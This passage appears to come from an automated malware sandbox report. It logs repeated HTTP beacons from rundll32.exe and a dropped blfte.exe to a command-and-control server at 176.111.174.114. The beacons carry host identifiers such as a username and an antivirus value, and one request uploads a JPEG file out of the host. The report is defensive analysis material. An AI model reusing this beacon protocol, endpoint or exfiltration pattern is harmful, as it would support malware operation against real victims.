                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 23:00:39.471328020 CEST13119OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:39.471532106 CEST13122OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          561192.168.2.450087176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:39.423311949 CEST13095OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          562176.111.174.11480192.168.2.450087C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:39.527647972 CEST13122INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          563192.168.2.450088176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:39.742125988 CEST13282OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          564176.111.174.11480192.168.2.450088C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:39.844007015 CEST13310INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          565176.111.174.11480192.168.2.450086C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:39.865937948 CEST13310INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          566192.168.2.450090176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:40.055641890 CEST13311OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          567176.111.174.11480192.168.2.450090C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:40.153601885 CEST13311INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:40 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          568192.168.2.450091176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:40.363915920 CEST13312OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          569176.111.174.11480192.168.2.450091C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:40.461193085 CEST13313INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:40 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          57176.111.174.11480192.168.2.449776C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:19.603080034 CEST4549INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:19 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          570192.168.2.450092176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:40.659600973 CEST13313OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          571176.111.174.11480192.168.2.450092C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:40.758877039 CEST13314INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:40 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          572192.168.2.450093176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:40.986804008 CEST13314OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          573176.111.174.11480192.168.2.450093C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:41.092780113 CEST13315INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          574192.168.2.450095176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:41.303684950 CEST13315OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          575176.111.174.11480192.168.2.450095C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:41.402677059 CEST13316INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          576192.168.2.450096176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:41.619910002 CEST13316OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          577176.111.174.11480192.168.2.450096C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:41.722769976 CEST13317INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          578192.168.2.450097176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:41.937402010 CEST13317OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          579176.111.174.11480192.168.2.450097C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:42.039381981 CEST13318INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          58192.168.2.449777176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:19.817760944 CEST4550OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          580192.168.2.450098176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:42.243216991 CEST13318OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          581176.111.174.11480192.168.2.450098C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:42.345041990 CEST13319INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          582192.168.2.450099176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:42.481595039 CEST13332OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 